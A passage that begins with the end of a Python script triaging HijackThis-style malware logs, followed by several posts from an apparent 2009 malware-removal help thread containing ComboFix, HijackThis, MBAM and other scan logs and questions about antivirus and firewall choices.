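LOOPBACK = {"127.0.0.1", "0.0.0.0", "::1"}
PRIVATE_PREFIXES = ("10.", "192.168.", "127.")


def parse_hjt(text):
    """Split each report line into kind, display name, CLSID and target."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == ".":          # DDS uses lone dots as spacers
            continue
        kind, sep, rest = line.partition(": ")
        if not sep:                          # e.g. "uStart Page = ..."
            entries.append({"kind": "other", "name": None, "clsid": None, "target": line})
            continue
        clsid = CLSID_RE.search(rest)
        run = RUN_RE.match(rest) if kind in RUN_KINDS else None
        if run:                              # "[name] command line"
            name, target = run.group(1), run.group(2)
        elif clsid:                          # "name: {clsid} - file"
            name = rest[:clsid.start()].rstrip(" :-") or None
            target = rest[clsid.end():].lstrip(" -:")
        elif " - " in rest:                  # "name - file"
            name, _, target = rest.partition(" - ")
        else:
            name, target = None, rest
        entries.append({"kind": kind, "name": name,
                        "clsid": clsid.group(0) if clsid else None,
                        "target": target})
    return entries


def command_image(cmdline):
    """Return the executable part of a Run value, quoted or not."""
    if cmdline.startswith('"'):
        return cmdline.strip('"').split('"')[0]
    return cmdline.split(" ")[0]


def triage(entries):
    """Return (flag, kind, subject, detail) tuples for entries worth a second look."""
    findings = []
    for e in entries:
        kind, target = e["kind"], e["target"]
        if target.endswith("No File"):
            # Registered COM object whose file is gone: a leftover or removed malware
            findings.append(("orphaned", kind, e["clsid"] or e["name"], target))
        if kind in RUN_KINDS:
            image = command_image(target)
            if "\\" not in image:
                # Bare file name: resolved via the search path, so a planted copy
                # earlier on that path would run instead of the intended one
                findings.append(("unqualified-path", kind, e["name"], image))
        if kind == "DPF":
            m = re.match(r"hxxps?://([^/]+)", target)
            if m:
                # ActiveX download sources; each host should be a known vendor
                findings.append(("activex-download", kind, e["clsid"], m.group(1)))
        if kind == "Hosts":
            ip, _, host = target.partition(" ")
            flag = "hosts-block" if ip in LOOPBACK else "hosts-redirect"
            findings.append((flag, kind, host, ip))
        if kind == "TCP" and "DhcpNameServer" in target:
            ip = target.rsplit("=", 1)[1].strip()
            if not ip.startswith(PRIVATE_PREFIXES):
                # DNS handed out from outside the LAN is a classic hijack sign
                findings.append(("external-dns", kind, e["name"], ip))
    return findings


def summarize(entries):
    """Count entries per report kind (BHO, DPF, mRun, ...)."""
    return Counter(e["kind"] for e in entries)


if __name__ == "__main__":
    parsed = parse_hjt(SAMPLE_LOG)
    print(dict(summarize(parsed)))
    for finding in triage(parsed):
        print(finding)
```

On the sample above it reports the orphaned EB entry, the bare-name 000StTHK.exe Run value, the Java ActiveX download host and the spywareinfo.com hosts-file block; the private DhcpNameServer is left alone.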
  8. ComboFix has been successfully uninstalled I believe. I did actually get worried at first that it was going to start scanning and cleaning again. Even though I used the /u switch, it was telling me it was about to run and to disable my anti-virus. I didn't disable AVG and instead of clicking the OK button on ComboFix's windows I was trying to close them. It ran anyway without my attempts to close the windows the normal way and appeared to uninstall, despite not switching off AVG or pressing OK.

Is there anything else I need to do at this point? Is it worth running any of the other commands that you posted for my other thread, due to the infection behaving in a similar fashion, such as the following:

CMD /C ECHO Y|CHKDSK C: /F | SHUTDOWN /R /T 30
CMD /C NETSH FIREWALL RESET
CMD /C NETSH int ip reset c:\resetlog.txt
CMD /C IPCONFIG /flushdns
CMD /C arp -d *
CMD /C netstat -a >C:\connections.txt
CMD /C fsutil fsinfo statistics c: >c:\drivestats.txt

As for the firewall, I'll most likely give ZoneAlarm Pro a miss. I'll use Online Armor Free for now but looking at the extra functions provided by the paid version makes me think I should at least buy a firewall to get added protection. ZoneAlarm did get good reviews but if you say it has become bloated then I doubt it will be much more pleasant to use than Norton's offering, which caused my PC to sweat. As you say though, there is only so much they can do. The main virus that got onto my system from the website dropped right in, past AVG's nose and then deliberately switched off XP's firewall. I wouldn't be surprised if it could do that with Norton, McAfee and ZoneAlarm.

Regards.
  9. Thank you for all of those tips. They will come in handy if I ever need to reinstall Windows on this PC or buy a new machine. This laptop is old now (dated late 2003) but I do very little PC gaming, so have never felt truly pushed to replace it. It feels like it was limited from the very beginning though as the graphics chip can't handle very much. I had to upgrade the RAM to improve performance but even now, any webpages with Flash animations cause the PC to become sluggish. Even simple things like mouse wheel scrolling becomes laboured if Flash ads are on the page.

Seeing as one of the main viruses that infected my PC this time was identical or related to the one that infected my PC before, when I needed your help, is it worth running any of the other commands that you advised me to do in my other thread? Commands such as flushing the DNS, resetting the firewall, IP reset and so on? Would it cause a problem if I did it just to be on the safe side? If I was worried about router security the last time round, could I not be under the same threat again (even though I never kept the default password)?

I'll certainly be buying the registered version of MBAM as it has done a fantastic job in finding lots of nasties (and just as importantly, killing them). I'm thinking I may need to buy better anti-virus software as well. I am currently using AVG 8.5 Free but haven't really tried anything else other than sluggish Norton Internet Security. Is there one you would recommend? Just as importantly, is there a firewall you would recommend buying? Are "Internet Suites" that have a firewall and anti-virus by the same developer better than separate ones, due to not needing multiple software engines running, or does it not really matter? ZoneAlarm Pro is supposed to be a good firewall but I always read that their anti-virus software is lacking.

Thanks again.
  10. The PC seems to be running fine so far. I haven't seen (or heard) any signs of anything nasty. I haven't yet tried performing a System Restore (after making a new Restore Point where things seem okay) to see if a Restore op will actually work once again.

The PC did appear to hang two days ago briefly. This happened during initial bootup, where you get to the Logon screen. The Windows screen saver came on as I had gone off to do something else while I was waiting for it to boot up (I often see plenty of disk access at the Logon screen so I prefer to let it do what it wants to before I log in and cause it to load up yet more). I moved the mouse and the screen went completely black. Nothing happened for just under a minute. No disk access or anything. Normally the screen saver will disappear straight away as soon as I move the mouse. However, I deliberately left it today so the screen saver would come on at the Logon screen and this time it responded fine.

Here is the log for NOD32:

ESETSmartInstaller@High as CAB hook log:
OnlineScanner.ocx - registred OK
# version=6
# iexplore.exe=7.00.6000.16791 (vista_gdr.081217-1620)
# OnlineScanner.ocx=1.0.0.6050
# api_version=3.0.2
# EOSSerial=cf5e79d1be913942bfcccf9d9a7fda7f
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2009-10-01 08:31:05
# local_time=2009-10-01 09:31:05 (+0000, GMT Daylight Time)
# country="United Kingdom"
# lang=1033
# osver=5.1.2600 NT Service Pack 3
# compatibility_mode=1026 21 66 100 35976343437500
# scanned=382104
# found=0
# cleaned=0
# scan_time=11458

I also ran Dr. Web (although I didn't update it as I don't really know what "launch.exe" is) and that didn't find anything either. I ran that because I remember that picking up something that other software had missed during the last infection I got. I downloaded it again as I remember you asking me to use that last time, and wanted to see if anything new would appear.

Regards.
  11. Spybot was successfully uninstalled, although I had to delete an associated folder in Documents & Settings. I forgot to check Program Files until after I did all these scans and deletions. There are lots of files still in there. This may have been caused by an old Restore Point as I was unable to uninstall Spybot until I installed a new version one day before I got the recent virus infection. I didn't have TeaTimer activated, just the added Internet Explorer protection. This aside, I hadn't noticed any trouble running the tasks you asked me to do and IE7 looks like it was when I first installed it.

Java was also successfully uninstalled. I needed to manually delete Sun folders from several places after running JavaRa. In Documents & Settings, I also found the Sun folder in the "Administrator" and "Default User" folders, as well as "All Users" and "user". I removed those as well, seeing as you said to remove all versions of Java.

Here is JavaRa.log:

JavaRa 1.15 Removal Log.
Report follows after line.
------------------------------------
The JavaRa removal process was started on Thu Oct 01 01:19:17 2009
Found and removed: SOFTWARE\Classes\JavaPlugin.150_03
Found and removed: SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\8A0F841731866D117AB7000B0D410200
Found and removed: SOFTWARE\Classes\JavaPlugin.142
------------------------------------
Finished reporting.

Next up is the latest MBAM log. I have run MBAM several times since the recent infection. Other than the first log I posted in this thread, MBAM has not detected anything:

Malwarebytes' Anti-Malware 1.41
Database version: 2879
Windows 5.1.2600 Service Pack 3

01/10/2009 02:09:56
mbam-log-2009-10-01 (02-09-56).txt

Scan type: Quick Scan
Objects scanned: 98398
Time elapsed: 7 minute(s), 47 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)

Next is System.ini:

; for 16-bit app support
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
[driver32]
[386enh]
woafont=app850.FON
EGA80WOA.FON=EGA80850.FON
EGA40WOA.FON=EGA40850.FON
CGA80WOA.FON=CGA80850.FON
CGA40WOA.FON=CGA40850.FON

Next is win.ini:

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
aif=MPEGVideo
aifc=MPEGVideo
aiff=MPEGVideo
asf=MPEGVideo2
asx=MPEGVideo2
au=MPEGVideo
m1v=MPEGVideo
mp2=MPEGVideo
mp2v=MPEGVideo
mpa=MPEGVideo
mpe=MPEGVideo
mpeg=MPEGVideo
mpg=MPEGVideo
mpv2=MPEGVideo
snd=MPEGVideo
wax=MPEGVideo2
wm=MPEGVideo2
wma=MPEGVideo2
wmv=MPEGVideo2
wmx=MPEGVideo2
wvx=MPEGVideo2
wpl=MPEGVideo
m2v=MPEGVideo
mod=MPEGVideo
mp3=MPEGVideo
m3u=MPEGVideo
[RAD Video Tools]
Path=C:\Documents and Settings\user\My Documents\RRogueTrooperAddons\Rogue Trooper Addons\trtraa\Sounds\Streams
BinkComp=/d650000 /m3.0 /l4 /p8
BinkMix=
SmackComp=/l104
SmackMix=/l104
BinkPlay=
SmackPlay=
BinkConv=/v
X=212
Y=123
W=563
H=538
[bOP]
forcemono=off
screensave=on
click=on
[MSUCE]
Advanced=0
CodePage=Unicode
Font=Arial

Rogue Trooper is a game and I had copied the movies to My Docs to view separately from the game. I'm not sure why the Pathname for it is still there though as neither the game nor the movies are currently on my hard disk.

After deleting Java, resetting IE7 and rebooting the PC, I see that Windows Security Centre is active again. The status panels for the Firewall, Windows Update and Virus Protection are visible once more, as is the red warning shield in the System Tray (because I have disabled Windows Updates). I also got a notification window, upon bootup, saying that Adobe Flash Player had an update. I guess that was just coincidence and probably because I had previously told it to remind me later after 30 days.

Thanks again.
  12. Hello again. Sorry I couldn't respond sooner. I was experiencing bad internet performance for the entire day yesterday. Speeds were either erratic, jumping constantly from 200KB to 400KB a second, or I was seeing virtually dial-up modem performance as I couldn't get faster than 10KB a second. It varied wherever I was downloading from and I couldn't get my usual 8Mbit speed. MBAM took twenty minutes to get the latest update. According to my ISP, there were some serious problems on the network but the area they listed it in was nowhere near where I live. It seems a lot better now so I am assuming that my speed issues were not related to any infection, although I am not 100% certain.

I successfully ran ComboFix. It took a long time to finish up, longer than when I had used it for my first infection. I didn't switch off my router while running it and I could connect to this site fine after running it, without needing to reboot.

Here are the following logs.

ComboFix.txt:

ComboFix 09-09-29.02 - user 30/09/2009 7:26.3.1 - NTFSx86
Running from: c:\documents and settings\user\Desktop\Combo-Fix.exe
* Created a new restore point
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
c:\windows\run.log
.
((((((((((((((((((((((((( Files Created from 2009-08-28 to 2009-09-30 )))))))))))))))))))))))))))))))
.
2009-09-29 23:59 . 2009-09-29 23:59 -------- d-----w- c:\program files\FLV Player
2009-09-29 23:20 . 2009-09-30 00:03 -------- d-----w- c:\documents and settings\user\Application Data\BID
2009-09-20 19:25 . 2009-09-20 21:37 -------- d-----w- c:\documents and settings\user\DoctorWeb
2009-09-13 02:38 . 2009-09-10 13:54 38224 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2009-09-13 02:38 . 2009-09-13 02:38 -------- d-----w- c:\program files\Malwarebytes' Anti-Malware
2009-09-13 02:38 . 2009-09-10 13:53 19160 ----a-w- c:\windows\system32\drivers\mbam.sys
2009-09-03 03:25 . 2009-09-03 03:25 -------- d-----w- c:\documents and settings\user\Application Data\Malwarebytes
2009-09-03 03:25 . 2009-09-03 03:25 -------- d-----w- c:\documents and settings\All Users\Application Data\Malwarebytes
2009-08-31 21:37 . 2009-08-31 21:37 -------- d-----w- c:\program files\Trend Micro
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-09-30 06:02 . 2007-06-28 00:17 -------- d-----w- c:\program files\GetRight
2009-09-29 23:20 . 2007-07-03 20:38 -------- d-----w- c:\program files\Bulk Image Downloader
2009-09-29 06:31 . 2008-04-20 17:13 -------- d-----w- c:\program files\Spybot - Search & Destroy
2009-09-29 06:28 . 2007-07-15 06:39 -------- d-----w- c:\documents and settings\All Users\Application Data\Spybot - Search & Destroy
2009-09-29 01:22 . 2007-12-29 12:48 -------- d-----w- c:\documents and settings\user\Application Data\uTorrent
2009-09-04 00:19 . 2005-05-27 22:46 -------- d-----w- c:\program files\ahead
2009-09-03 23:36 . 2003-12-03 15:08 -------- d--h--w- c:\program files\InstallShield Installation Information
2009-09-03 23:36 . 2007-08-13 07:14 -------- d-----w- c:\program files\Real
2009-09-03 23:32 . 2008-03-11 21:50 -------- d-----w- c:\program files\Meridian Advance
2009-09-03 01:45 . 2009-04-16 05:46 -------- d-----w- c:\program files\PicaLoader
2009-08-24 02:17 . 2009-02-27 16:43 123 ----a-w- C:\drmHeader.bin
2009-08-21 10:05 . 2009-07-17 17:33 -------- d-----w- c:\documents and settings\user\Application Data\Free Audio Editor
2009-08-21 05:10 . 2008-06-19 10:53 11952 ----a-w- c:\windows\system32\avgrsstx.dll
2009-08-21 05:10 . 2008-06-19 10:53 335240 ----a-w- c:\windows\system32\drivers\avgldx86.sys
2009-08-21 05:10 . 2008-06-19 10:53 27784 ----a-w- c:\windows\system32\drivers\avgmfx86.sys
.
------- Sigcheck -------
[7] 2008-04-14 . 6D4FEB43EE538FC5428CC7F0565AA656 . 56320 . . [5.1.2600.5512] . . c:\windows\ERDNT\cache\eventlog.dll
[7] 2008-04-14 . 6D4FEB43EE538FC5428CC7F0565AA656 . 56320 . . [5.1.2600.5512] . . c:\windows\ServicePackFiles\i386\eventlog.dll
[7] 2004-08-04 . 82B24CB70E5944E6E34662205A2A5B78 . 55808 . . [5.1.2600.2180] . . c:\windows\$NtServicePackUninstall$\eventlog.dll
c:\windows\system32\eventlog.dll ... is missing !!
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NoAds"="c:\program files\NoAds\NoAds.exe" [2007-10-27 151552]
"Mmm"="c:\program files\HACE\Mmm\Mmm.exe" [2005-07-05 828416]
"WMPNSCFG"="c:\program files\Windows Media Player\WMPNSCFG.exe" [2006-10-18 204288]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IgfxTray"="c:\windows\System32\igfxtray.exe" [2003-04-07 155648]
"HotKeysCmds"="c:\windows\System32\hkcmd.exe" [2003-04-07 114688]
"00THotkey"="c:\windows\System32\00THotkey.exe" [2003-05-23 253952]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2003-07-17 159744]
"TouchED"="c:\program files\TOSHIBA\TouchED\TouchED.Exe" [2003-03-11 122880]
"PadTouch"="c:\program files\TOSHIBA\PadTouch\PadExe.exe" [2003-11-24 1019904]
"NeroCheck"="c:\windows\system32\NeroCheck.exe" [2001-07-09 155648]
"AVG8_TRAY"="c:\progra~1\AVG\AVG8\avgtray.exe" [2009-08-21 2007832]
"Malwarebytes Anti-Malware (reboot)"="c:\program files\Malwarebytes' Anti-Malware\mbam.exe" [2009-09-10 1312080]
"000StTHK"="000StTHK.exe" - c:\windows\system32\000StTHK.exe [2001-06-23 24576]
"LTSMMSG"="LTSMMSG.exe" - c:\windows\ltsmmsg.exe [2003-04-18 32768]
"TFNF5"="TFNF5.exe" - c:\windows\system32\TFNF5.exe [2003-10-15 73728]
"TPSMain"="TPSMain.exe" - c:\windows\system32\TPSMain.exe [2003-11-27 266240]
"TFncKy"="TFncKy.exe" [bU]
"Kernel and Hardware Abstraction Layer"="KHALMNPR.EXE" - c:\windows\KHALMNPR.Exe [2008-12-18 76304]

c:\documents and settings\All Users\Start Menu\Programs\Startup\
Adobe Reader Speed Launch.lnk - c:\program files\Adobe\Acrobat 7.0\Reader\reader_sl.exe [2008-4-23 29696]
Logitech SetPoint.lnk - c:\program files\Logitech\SetPoint\SetPoint.exe [2009-6-2 809488]
Microsoft Works Calendar Reminders.lnk - c:\program files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe [1999-9-4 53317]
Start GetRight.lnk - c:\program files\GetRight\GetRight.exe [2007-6-28 4628752]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\LBTWlgn]
2009-02-18 23:30 72208 ----a-w- c:\program files\Common Files\Logishrd\Bluetooth\LBTWLgn.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\avgrsstarter]
2009-08-21 05:10 11952 ----a-w- c:\windows\system32\avgrsstx.dll

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WdfLoadGroup]
@=""

[HKEY_LOCAL_MACHINE\software\microsoft\security center]
"AntiVirusOverride"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=

R3 SMCWGU(SMC);SMCWUSB-G 802.11g Wireless USB 2.0 Adapter(SMC);c:\windows\system32\DRIVERS\SMCWGU.sys [x]
S1 AvgLdx86;AVG AVI Loader Driver x86;c:\windows\System32\Drivers\avgldx86.sys [2009-08-21 335240]
S1 SSHDRV76;SSHDRV76;c:\windows\system32\drivers\SSHDRV76.sys [2008-05-24 53760]
S2 avg8wd;AVG8 WatchDog;c:\progra~1\AVG\AVG8\avgwdsvc.exe [2009-08-21 297752]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://home.live.com/
uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8
uInternet Settings,ProxyOverride = <local>
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
IE: Download with GetRight - c:\program files\GetRight\GRdownload.htm
IE: Open with GetRight Browser - c:\program files\GetRight\GRbrowse.htm
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - hxxp://download.eset.com/special/eos/OnlineScanner.cab
.
**************************************************************************
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-09-30 07:33
Windows 5.1.2600 Service Pack 3 NTFS
scanning hidden processes ...
scanning hidden autostart entries ...
scanning hidden files ...
scan completed successfully
hidden files: 0
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
[HKEY_USERS\S-1-5-21-2888162382-313132713-241459312-1006\Software\Microsoft\SystemCertificates\AddressBook*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)
.
--------------------- DLLs Loaded Under Running Processes ---------------------
- - - - - - - > 'winlogon.exe'(424)
c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll
c:\program files\common files\logishrd\bluetooth\LBTServ.dll
.
Completion time: 2009-09-30 7:38
ComboFix-quarantined-files.txt 2009-09-30 06:37
Pre-Run: 2,550,685,696 bytes free
Post-Run: 2,524,905,472 bytes free
125

ComboFix-quarantined-files.txt:

2009-09-30 06:32:07 . 2009-09-30 06:32:07 6,656 ----a-w- C:\Qoobox\Quarantine\Registry_backups\tcpip.reg
2009-09-30 06:24:47 . 2009-09-30 06:24:47 51 ----a-w- C:\Qoobox\Quarantine\catchme.log
2009-09-28 23:12:30 . 2009-09-28 23:12:30 10 ----a-w- C:\Qoobox\Quarantine\C\WINDOWS\run.log.vir

HijackThis log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 08:06:52, on 30/09/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16791)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\WINDOWS\System32\hkcmd.exe
C:\WINDOWS\System32\00THotkey.exe
C:\WINDOWS\LTSMMSG.exe
C:\Program Files\Apoint2K\Apoint.exe
C:\Program Files\TOSHIBA\TouchED\TouchED.Exe
C:\WINDOWS\system32\TFNF5.exe
C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe
C:\PROGRA~1\AVG\AVG8\avgtray.exe
C:\WINDOWS\system32\TPSBattM.exe
C:\Program Files\NoAds\NoAds.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Apoint2K\Apntex.exe
C:\Program Files\Logitech\SetPoint\SetPoint.exe
C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.EXE
C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
C:\WINDOWS\explorer.exe
C:\Program Files\internet explorer\iexplore.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://home.live.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll (file missing)
O2 - BHO: IE to GetRight Helper - {31FF080D-12A3-439A-A2EF-4BA95A3148E8} - C:\Program Files\GetRight\xx2gr.dll
O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - C:\Program Files\AVG\AVG8\avgssie.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll (file missing)
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.0.1225.9868\swg.dll (file missing)
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll (file missing)
O4 - HKLM\..\Run: [igfxTray] C:\WINDOWS\System32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\System32\hkcmd.exe
O4 - HKLM\..\Run: [00THotkey] C:\WINDOWS\System32\00THotkey.exe
O4 - HKLM\..\Run: [000StTHK] 000StTHK.exe
O4 - HKLM\..\Run: [LTSMMSG] LTSMMSG.exe
O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe
O4 - HKLM\..\Run: [TouchED] C:\Program Files\TOSHIBA\TouchED\TouchED.Exe
O4 - HKLM\..\Run: [PadTouch] "C:\Program Files\TOSHIBA\PadTouch\PadExe.exe
O4 - HKLM\..\Run: [TFNF5] TFNF5.exe
O4 - HKLM\..\Run: [TPSMain] TPSMain.exe
O4 - HKLM\..\Run: [TFncKy] TFncKy.exe
O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [AVG8_TRAY] C:\PROGRA~1\AVG\AVG8\avgtray.exe
O4 - HKLM\..\Run: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE
O4 - HKLM\..\Run: [Malwarebytes Anti-Malware (reboot)] "C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe" /runcleanupscript
O4 - HKCU\..\Run: [NoAds] "C:\Program Files\NoAds\NoAds.exe"
O4 - HKCU\..\Run: [Mmm] "C:\Program Files\HACE\Mmm\Mmm.exe"
O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe
O4 - HKUS\S-1-5-21-2888162382-313132713-241459312-1006\..\Run: [NoAds] "C:\Program Files\NoAds\NoAds.exe" (User '?')
O4 - HKUS\S-1-5-21-2888162382-313132713-241459312-1006\..\Run: [Mmm] "C:\Program Files\HACE\Mmm\Mmm.exe" (User '?')
O4 - HKUS\S-1-5-21-2888162382-313132713-241459312-1006\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe (User '?')
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe
O4 - Global Startup: Microsoft Works Calendar Reminders.lnk = ?
O4 - Global Startup: Start GetRight.lnk = C:\Program Files\GetRight\GetRight.exe
O8 - Extra context menu item: Download with GetRight - C:\Program Files\GetRight\GRdownload.htm
O8 - Extra context menu item: Open with GetRight Browser - C:\Program Files\GetRight\GRbrowse.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search && Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O14 - IERESET.INF: START_PAGE_URL=file:///C:\Program Files\TOSHIBA\Free Update Service\splash.html
O16 - DPF: {215B8138-A3CF-44C5-803F-8226143CFC0A} (Trend Micro ActiveX Scan Agent 6.6) - http://housecall65.trendmicro.com/housecal...ivex/hcImpl.cab
O16 - DPF: {39B0684F-D7BF-4743-B050-FDC3F48F7E3B} - http://www.fileplanet.com/fpdlmgr/cabs/FPDC_2.3.6.108.cab
O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} (MSN Photo Upload Tool) - http://gfx1.hotmail.com/mail/w2/pr02/resources/MSNPUpld.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/...b?1238014490265
O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - http://download.eset.com/special/eos/OnlineScanner.cab
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} (Java Runtime Environment 1.6.0) - http://dl8-cdn-01.sun.com/s/ESD44/JSCDL/jd...ows-i586-jc.cab
O16 - DPF: {A796D216-2DE1-4EA8-BABB-FE6E7C959098} (HPSDDX Class) - http://www.hp.com/cpso-support-new/SDD/hpsddObjSigned.cab
O16 - DPF: {A90A5822-F108-45AD-8482-9BC8B12DD539} (Crucial cpcScan) - http://crucial.com/controls/cpcScanner.cab
O16 - DPF: {D821DC4A-0814-435E-9820-661C543A4679} (CRLDownloadWrapper Class) - http://drmlicense.one.microsoft.com/crlupdate/en/crlocx.ocx
O18 - Protocol: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG8\avgpp.dll
O20 - Winlogon Notify: avgrsstarter - C:\WINDOWS\SYSTEM32\avgrsstx.dll
O23 - Service: AVG8 WatchDog (avg8wd) - AVG Technologies CZ, s.r.o. - C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
O23 - Service: C-DillaSrv - C-Dilla Ltd - C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE
